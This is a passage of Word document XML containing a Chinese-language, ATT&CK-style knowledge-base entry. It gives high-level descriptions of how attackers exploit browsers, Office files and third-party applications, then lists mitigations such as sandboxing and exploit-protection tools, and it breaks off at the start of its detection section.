                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）远程访问的服务。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DDED479" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防病毒，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统调用，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4889FB60" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707D6E69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33441EC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="575D5537" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会导致意外行为的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安全编码实践，软件中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞。攻击者可以针对性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>地</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用某些漏洞来达到执行任意代码的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。对攻击性工具包来说</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>最有利用价值</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通常是那些可利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在远程系统上执行代码的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为利用这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>漏洞可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问该系统。用户将期望看到与他们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>工作中常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的文件。由于这些文件具有很高的实用性，常用于漏洞攻击研究和开发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329AFD2B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本节</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>描述</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下几种利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF1A75" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6F16B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器是网页木马攻陷和鱼叉式钓鱼攻击链接的共同目标。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会在用户正常浏览网络或遭受鱼叉式钓鱼攻击时入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端点</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遭受带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>链接的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鱼叉式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>钓鱼攻击时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户被邮件中的链接定向到攻击者控制的、用来利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>浏览器的网站。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要用户执行什么</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>操作就能达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8538A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>办公应用利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA99B69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等常见办</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公和生产</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>力</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>附件、链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的形式来实施鱼叉式</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>钓鱼攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意文件以附件或链接形式直接传送给</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>诱使用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载它们。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>这过程中，攻击者需要用户打开文档或文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A21B67">
        <w:t>攻击目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC19E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>第三方应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A39CDFE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>也可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用其他常见应用或目标网络中部署</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件应用来实施攻击。企业环境中的常见应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Adobe Reader</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一直是攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>企图</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问系统的目标。软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>和漏洞本身的性质可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要某些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>漏洞在浏览器中利用，或需要用户打开文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。例如，某些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已作为对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档中传递。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A04969" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="46655D9E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2E2D2D91" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1639E726" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3347D11A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C554CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>隔离和沙箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62535DF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>用浏览器沙箱</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>缓解漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>一些影响，但可能会有沙箱逃逸。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>其他类型的虚拟化和应用微</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分区来缓解</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>客户端漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的影响。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这些系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>中仍然可能存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>其它</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缺陷</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>等风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="06C7FAC6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="652D9129" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2026AD02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>安全应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>比如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>WDEG</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows Defender Exploit Guard</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>）和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Enhanced Mitigation Experience Toolkit</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查找</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>行为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>从而缓解某些漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击行为</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的影响。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>也可</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>通过控制流完整性检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>识别和阻止软件攻击。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>许多保护</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>措施</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>依赖于体系结构和目标应用二进制文件的兼容性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40EC37A0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411EC9B8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>软件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测可能很困难</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>具体取决于可用的</w:t>
      </w:r>
